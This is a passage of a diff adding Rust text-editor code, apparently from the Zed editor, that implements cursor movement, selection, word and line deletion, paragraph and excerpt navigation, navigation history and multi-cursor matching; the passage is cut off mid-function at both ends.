&SelectUpByLines, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let 
text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::up_by_rows(map, head, action.lines, goal, false, text_layout_details) + }) + }) + } + + pub fn select_page_up( + &mut self, + _: &SelectPageUp, + window: &mut Window, + cx: &mut Context, + ) { + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::up_by_rows(map, head, row_count, goal, false, text_layout_details) + }) + }) + } + + pub fn move_page_up( + &mut self, + action: &MovePageUp, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if self + .context_menu + .borrow_mut() + .as_mut() + .map(|menu| menu.select_first(self.completion_provider.as_deref(), cx)) + .unwrap_or(false) + { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let autoscroll = if action.center_cursor { + Autoscroll::center() + } else { + Autoscroll::fit() + }; + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(autoscroll), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::up_by_rows( + map, + selection.end, + row_count, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + } + + pub fn select_up(&mut self, _: &SelectUp, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::up(map, head, goal, false, text_layout_details) + }) + }) + } + + pub fn move_down(&mut self, _: &MoveDown, window: &mut Window, cx: &mut Context) { + self.take_rename(true, window, cx); + + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + let selection_count = self.selections.count(); + let first_selection = self.selections.first_anchor(); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::down( + map, + selection.end, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + + if selection_count == 1 && first_selection.range() == self.selections.first_anchor().range() + { + cx.propagate(); + } + } + + pub fn select_page_down( + &mut self, + _: &SelectPageDown, + window: &mut Window, + cx: &mut Context, + ) { + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let text_layout_details = &self.text_layout_details(window); + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::down_by_rows(map, head, row_count, goal, false, text_layout_details) + }) + }) + } + + pub fn move_page_down( + &mut self, + action: &MovePageDown, + window: &mut Window, + cx: &mut Context, + ) { + if self.take_rename(true, window, cx).is_some() { + return; + } + + if self + .context_menu + .borrow_mut() + .as_mut() + .map(|menu| menu.select_last(self.completion_provider.as_deref(), cx)) + .unwrap_or(false) + { + return; + } + + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + + let Some(row_count) = self.visible_row_count() else { + return; + }; + + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let autoscroll = if action.center_cursor { + Autoscroll::center() + } else { + Autoscroll::fit() + }; + + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(autoscroll), window, cx, |s| { + s.move_with(|map, selection| { + if !selection.is_empty() { + selection.goal = SelectionGoal::None; + } + let (cursor, goal) = movement::down_by_rows( + map, + selection.end, + row_count, + selection.goal, + false, + text_layout_details, + ); + selection.collapse_to(cursor, goal); + }); + }); + } + + pub fn select_down(&mut self, _: &SelectDown, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let text_layout_details = &self.text_layout_details(window); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, goal| { + movement::down(map, head, goal, false, text_layout_details) + }) + }); + } + + pub fn context_menu_first( + &mut self, + _: &ContextMenuFirst, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_first(self.completion_provider.as_deref(), cx); + } + } + + pub fn context_menu_prev( + &mut self, + _: &ContextMenuPrevious, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_prev(self.completion_provider.as_deref(), cx); + } + } + + pub fn context_menu_next( + &mut self, + _: &ContextMenuNext, + _window: &mut Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_next(self.completion_provider.as_deref(), cx); + } + } + + pub fn context_menu_last( + &mut self, + _: &ContextMenuLast, + _window: &mut 
Window, + cx: &mut Context, + ) { + if let Some(context_menu) = self.context_menu.borrow_mut().as_mut() { + context_menu.select_last(self.completion_provider.as_deref(), cx); + } + } + + pub fn move_to_previous_word_start( + &mut self, + _: &MoveToPreviousWordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::previous_word_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_previous_subword_start( + &mut self, + _: &MoveToPreviousSubwordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::previous_subword_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_previous_word_start( + &mut self, + _: &SelectToPreviousWordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::previous_word_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_previous_subword_start( + &mut self, + _: &SelectToPreviousSubwordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::previous_subword_start(map, head), + SelectionGoal::None, + ) + }); + }) + } + + pub fn delete_to_previous_word_start( + &mut self, + action: &DeleteToPreviousWordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + 
self.transact(window, cx, |this, window, cx| { + this.select_autoclose_pair(window, cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = if action.ignore_newlines { + movement::previous_word_start(map, selection.head()) + } else { + movement::previous_word_start_or_newline(map, selection.head()) + }; + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn delete_to_previous_subword_start( + &mut self, + _: &DeleteToPreviousSubwordStart, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_autoclose_pair(window, cx); + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = movement::previous_subword_start(map, selection.head()); + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn move_to_next_word_end( + &mut self, + _: &MoveToNextWordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + (movement::next_word_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn move_to_next_subword_end( + &mut self, + _: &MoveToNextSubwordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + (movement::next_subword_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn select_to_next_word_end( + &mut self, + _: &SelectToNextWordEnd, + window: &mut Window, + cx: &mut Context, + ) { + 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + (movement::next_word_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn select_to_next_subword_end( + &mut self, + _: &SelectToNextSubwordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + (movement::next_subword_end(map, head), SelectionGoal::None) + }); + }) + } + + pub fn delete_to_next_word_end( + &mut self, + action: &DeleteToNextWordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = if action.ignore_newlines { + movement::next_word_end(map, selection.head()) + } else { + movement::next_word_end_or_newline(map, selection.head()) + }; + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn delete_to_next_subword_end( + &mut self, + _: &DeleteToNextSubwordEnd, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + if selection.is_empty() { + let cursor = movement::next_subword_end(map, selection.head()); + selection.set_head(cursor, SelectionGoal::None); + } + }); + }); + this.insert("", window, cx); + }); + } + + pub fn move_to_beginning_of_line( + &mut self, + action: &MoveToBeginningOfLine, + window: &mut Window, + cx: &mut Context, + ) { + 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::indented_line_beginning( + map, + head, + action.stop_at_soft_wraps, + action.stop_at_indent, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_beginning_of_line( + &mut self, + action: &SelectToBeginningOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::indented_line_beginning( + map, + head, + action.stop_at_soft_wraps, + action.stop_at_indent, + ), + SelectionGoal::None, + ) + }); + }); + } + + pub fn delete_to_beginning_of_line( + &mut self, + action: &DeleteToBeginningOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|_, selection| { + selection.reversed = true; + }); + }); + + this.select_to_beginning_of_line( + &SelectToBeginningOfLine { + stop_at_soft_wraps: false, + stop_at_indent: action.stop_at_indent, + }, + window, + cx, + ); + this.backspace(&Backspace, window, cx); + }); + } + + pub fn move_to_end_of_line( + &mut self, + action: &MoveToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_cursors_with(|map, head, _| { + ( + movement::line_end(map, head, action.stop_at_soft_wraps), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_line( + &mut self, + action: &SelectToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + 
self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::line_end(map, head, action.stop_at_soft_wraps), + SelectionGoal::None, + ) + }); + }) + } + + pub fn delete_to_end_of_line( + &mut self, + _: &DeleteToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_to_end_of_line( + &SelectToEndOfLine { + stop_at_soft_wraps: false, + }, + window, + cx, + ); + this.delete(&Delete, window, cx); + }); + } + + pub fn cut_to_end_of_line( + &mut self, + _: &CutToEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + this.select_to_end_of_line( + &SelectToEndOfLine { + stop_at_soft_wraps: false, + }, + window, + cx, + ); + this.cut(&Cut, window, cx); + }); + } + + pub fn move_to_start_of_paragraph( + &mut self, + _: &MoveToStartOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::start_of_paragraph(map, selection.head(), 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_end_of_paragraph( + &mut self, + _: &MoveToEndOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::end_of_paragraph(map, selection.head(), 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_start_of_paragraph( + &mut self, + _: &SelectToStartOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::start_of_paragraph(map, head, 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_paragraph( + &mut self, + _: &SelectToEndOfParagraph, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::end_of_paragraph(map, head, 1), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_start_of_excerpt( + &mut self, + _: &MoveToStartOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::start_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Prev, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_start_of_next_excerpt( + &mut self, + _: &MoveToStartOfNextExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::start_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Next, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_end_of_excerpt( + &mut self, + _: &MoveToEndOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::end_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Next, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_end_of_previous_excerpt( + &mut self, + _: &MoveToEndOfPreviousExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_with(|map, selection| { + selection.collapse_to( + movement::end_of_excerpt( + map, + selection.head(), + workspace::searchable::Direction::Prev, + ), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_start_of_excerpt( + &mut self, + _: &SelectToStartOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::start_of_excerpt(map, head, workspace::searchable::Direction::Prev), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_start_of_next_excerpt( + &mut self, + _: &SelectToStartOfNextExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::start_of_excerpt(map, head, workspace::searchable::Direction::Next), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_excerpt( + &mut self, + _: &SelectToEndOfExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::end_of_excerpt(map, head, workspace::searchable::Direction::Next), + SelectionGoal::None, + ) + }); + }) + } + + pub fn select_to_end_of_previous_excerpt( + &mut self, + _: &SelectToEndOfPreviousExcerpt, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.move_heads_with(|map, head, _| { + ( + movement::end_of_excerpt(map, head, workspace::searchable::Direction::Prev), + SelectionGoal::None, + ) + }); + }) + } + + pub fn move_to_beginning( + &mut self, + _: &MoveToBeginning, + window: &mut Window, + cx: &mut Context, + ) { + if matches!(self.mode, EditorMode::SingleLine { .. }) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(vec![0..0]); + }); + } + + pub fn select_to_beginning( + &mut self, + _: &SelectToBeginning, + window: &mut Window, + cx: &mut Context, + ) { + let mut selection = self.selections.last::(cx); + selection.set_head(Point::zero(), SelectionGoal::None); + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(vec![selection]); + }); + } + + pub fn move_to_end(&mut self, _: &MoveToEnd, window: &mut Window, cx: &mut Context) { + if matches!(self.mode, EditorMode::SingleLine { .. 
}) { + cx.propagate(); + return; + } + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let cursor = self.buffer.read(cx).read(cx).len(); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_ranges(vec![cursor..cursor]) + }); + } + + pub fn set_nav_history(&mut self, nav_history: Option) { + self.nav_history = nav_history; + } + + pub fn nav_history(&self) -> Option<&ItemNavHistory> { + self.nav_history.as_ref() + } + + pub fn create_nav_history_entry(&mut self, cx: &mut Context) { + self.push_to_nav_history(self.selections.newest_anchor().head(), None, false, cx); + } + + fn push_to_nav_history( + &mut self, + cursor_anchor: Anchor, + new_position: Option, + is_deactivate: bool, + cx: &mut Context, + ) { + if let Some(nav_history) = self.nav_history.as_mut() { + let buffer = self.buffer.read(cx).read(cx); + let cursor_position = cursor_anchor.to_point(&buffer); + let scroll_state = self.scroll_manager.anchor(); + let scroll_top_row = scroll_state.top_row(&buffer); + drop(buffer); + + if let Some(new_position) = new_position { + let row_delta = (new_position.row as i64 - cursor_position.row as i64).abs(); + if row_delta < MIN_NAVIGATION_HISTORY_ROW_DELTA { + return; + } + } + + nav_history.push( + Some(NavigationData { + cursor_anchor, + cursor_position, + scroll_anchor: scroll_state, + scroll_top_row, + }), + cx, + ); + cx.emit(EditorEvent::PushedToNavHistory { + anchor: cursor_anchor, + is_deactivate, + }) + } + } + + pub fn select_to_end(&mut self, _: &SelectToEnd, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let buffer = self.buffer.read(cx).snapshot(cx); + let mut selection = self.selections.first::(cx); + selection.set_head(buffer.len(), SelectionGoal::None); + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(vec![selection]); + }); + } + + pub fn select_all(&mut self, _: &SelectAll, window: &mut Window, cx: &mut Context) { + 
self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let end = self.buffer.read(cx).read(cx).len(); + self.change_selections(None, window, cx, |s| { + s.select_ranges(vec![0..end]); + }); + } + + pub fn select_line(&mut self, _: &SelectLine, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let mut selections = self.selections.all::(cx); + let max_point = display_map.buffer_snapshot.max_point(); + for selection in &mut selections { + let rows = selection.spanned_rows(true, &display_map); + selection.start = Point::new(rows.start.0, 0); + selection.end = cmp::min(max_point, Point::new(rows.end.0, 0)); + selection.reversed = false; + } + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(selections); + }); + } + + pub fn split_selection_into_lines( + &mut self, + _: &SplitSelectionIntoLines, + window: &mut Window, + cx: &mut Context, + ) { + let selections = self + .selections + .all::(cx) + .into_iter() + .map(|selection| selection.start..selection.end) + .collect::>(); + self.unfold_ranges(&selections, true, true, cx); + + let mut new_selection_ranges = Vec::new(); + { + let buffer = self.buffer.read(cx).read(cx); + for selection in selections { + for row in selection.start.row..selection.end.row { + let cursor = Point::new(row, buffer.line_len(MultiBufferRow(row))); + new_selection_ranges.push(cursor..cursor); + } + + let is_multiline_selection = selection.start.row != selection.end.row; + // Don't insert last one if it's a multi-line selection ending at the start of a line, + // so this action feels more ergonomic when paired with other selection operations + let should_skip_last = is_multiline_selection && selection.end.column == 0; + if !should_skip_last { + new_selection_ranges.push(selection.end..selection.end); + } + } + } + self.change_selections(Some(Autoscroll::fit()), window, cx, 
|s| { + s.select_ranges(new_selection_ranges); + }); + } + + pub fn add_selection_above( + &mut self, + _: &AddSelectionAbove, + window: &mut Window, + cx: &mut Context, + ) { + self.add_selection(true, window, cx); + } + + pub fn add_selection_below( + &mut self, + _: &AddSelectionBelow, + window: &mut Window, + cx: &mut Context, + ) { + self.add_selection(false, window, cx); + } + + fn add_selection(&mut self, above: bool, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::MovementAction); + + let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); + let mut selections = self.selections.all::(cx); + let text_layout_details = self.text_layout_details(window); + let mut state = self.add_selections_state.take().unwrap_or_else(|| { + let oldest_selection = selections.iter().min_by_key(|s| s.id).unwrap().clone(); + let range = oldest_selection.display_range(&display_map).sorted(); + + let start_x = display_map.x_for_display_point(range.start, &text_layout_details); + let end_x = display_map.x_for_display_point(range.end, &text_layout_details); + let positions = start_x.min(end_x)..start_x.max(end_x); + + selections.clear(); + let mut stack = Vec::new(); + for row in range.start.row().0..=range.end.row().0 { + if let Some(selection) = self.selections.build_columnar_selection( + &display_map, + DisplayRow(row), + &positions, + oldest_selection.reversed, + &text_layout_details, + ) { + stack.push(selection.id); + selections.push(selection); + } + } + + if above { + stack.reverse(); + } + + AddSelectionsState { above, stack } + }); + + let last_added_selection = *state.stack.last().unwrap(); + let mut new_selections = Vec::new(); + if above == state.above { + let end_row = if above { + DisplayRow(0) + } else { + display_map.max_point().row() + }; + + 'outer: for selection in selections { + if selection.id == last_added_selection { + let range = selection.display_range(&display_map).sorted(); + 
debug_assert_eq!(range.start.row(), range.end.row()); + let mut row = range.start.row(); + let positions = + if let SelectionGoal::HorizontalRange { start, end } = selection.goal { + px(start)..px(end) + } else { + let start_x = + display_map.x_for_display_point(range.start, &text_layout_details); + let end_x = + display_map.x_for_display_point(range.end, &text_layout_details); + start_x.min(end_x)..start_x.max(end_x) + }; + + while row != end_row { + if above { + row.0 -= 1; + } else { + row.0 += 1; + } + + if let Some(new_selection) = self.selections.build_columnar_selection( + &display_map, + row, + &positions, + selection.reversed, + &text_layout_details, + ) { + state.stack.push(new_selection.id); + if above { + new_selections.push(new_selection); + new_selections.push(selection); + } else { + new_selections.push(selection); + new_selections.push(new_selection); + } + + continue 'outer; + } + } + } + + new_selections.push(selection); + } + } else { + new_selections = selections; + new_selections.retain(|s| s.id != last_added_selection); + state.stack.pop(); + } + + self.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections); + }); + if state.stack.len() > 1 { + self.add_selections_state = Some(state); + } + } + + pub fn select_next_match_internal( + &mut self, + display_map: &DisplaySnapshot, + replace_newest: bool, + autoscroll: Option, + window: &mut Window, + cx: &mut Context, + ) -> Result<()> { + fn select_next_match_ranges( + this: &mut Editor, + range: Range, + reversed: bool, + replace_newest: bool, + auto_scroll: Option, + window: &mut Window, + cx: &mut Context, + ) { + this.unfold_ranges(&[range.clone()], false, auto_scroll.is_some(), cx); + this.change_selections(auto_scroll, window, cx, |s| { + if replace_newest { + s.delete(s.newest_anchor().id); + } + if reversed { + s.insert_range(range.end..range.start); + } else { + s.insert_range(range); + } + }); + } + + let buffer = &display_map.buffer_snapshot; + let mut 
selections = self.selections.all::(cx); + if let Some(mut select_next_state) = self.select_next_state.take() { + let query = &select_next_state.query; + if !select_next_state.done { + let first_selection = selections.iter().min_by_key(|s| s.id).unwrap(); + let last_selection = selections.iter().max_by_key(|s| s.id).unwrap(); + let mut next_selected_range = None; + + let bytes_after_last_selection = + buffer.bytes_in_range(last_selection.end..buffer.len()); + let bytes_before_first_selection = buffer.bytes_in_range(0..first_selection.start); + let query_matches = query + .stream_find_iter(bytes_after_last_selection) + .map(|result| (last_selection.end, result)) + .chain( + query + .stream_find_iter(bytes_before_first_selection) + .map(|result| (0, result)), + ); + + for (start_offset, query_match) in query_matches { + let query_match = query_match.unwrap(); // can only fail due to I/O + let offset_range = + start_offset + query_match.start()..start_offset + query_match.end(); + let display_range = offset_range.start.to_display_point(display_map) + ..offset_range.end.to_display_point(display_map); + + if !select_next_state.wordwise + || (!movement::is_inside_word(display_map, display_range.start) + && !movement::is_inside_word(display_map, display_range.end)) + { + // TODO: This is n^2, because we might check all the selections + if !selections + .iter() + .any(|selection| selection.range().overlaps(&offset_range)) + { + next_selected_range = Some(offset_range); + break; + } + } + } + + if let Some(next_selected_range) = next_selected_range { + select_next_match_ranges( + self, + next_selected_range, + last_selection.reversed, + replace_newest, + autoscroll, + window, + cx, + ); + } else { + select_next_state.done = true; + } + } + + self.select_next_state = Some(select_next_state); + } else { + let mut only_carets = true; + let mut same_text_selected = true; + let mut selected_text = None; + + let mut selections_iter = selections.iter().peekable(); + while let 
Some(selection) = selections_iter.next() { + if selection.start != selection.end { + only_carets = false; + } + + if same_text_selected { + if selected_text.is_none() { + selected_text = + Some(buffer.text_for_range(selection.range()).collect::()); + } + + if let Some(next_selection) = selections_iter.peek() { + if next_selection.range().len() == selection.range().len() { + let next_selected_text = buffer + .text_for_range(next_selection.range()) + .collect::(); + if Some(next_selected_text) != selected_text { + same_text_selected = false; + selected_text = None; + } + } else { + same_text_selected = false; + selected_text = None; + } + } + } + } + + if only_carets { + for selection in &mut selections { + let word_range = movement::surrounding_word( + display_map, + selection.start.to_display_point(display_map), + ); + selection.start = word_range.start.to_offset(display_map, Bias::Left); + selection.end = word_range.end.to_offset(display_map, Bias::Left); + selection.goal = SelectionGoal::None; + selection.reversed = false; + select_next_match_ranges( + self, + selection.start..selection.end, + selection.reversed, + replace_newest, + autoscroll, + window, + cx, + ); + } + + if selections.len() == 1 { + let selection = selections + .last() + .expect("ensured that there's only one selection"); + let query = buffer + .text_for_range(selection.start..selection.end) + .collect::(); + let is_empty = 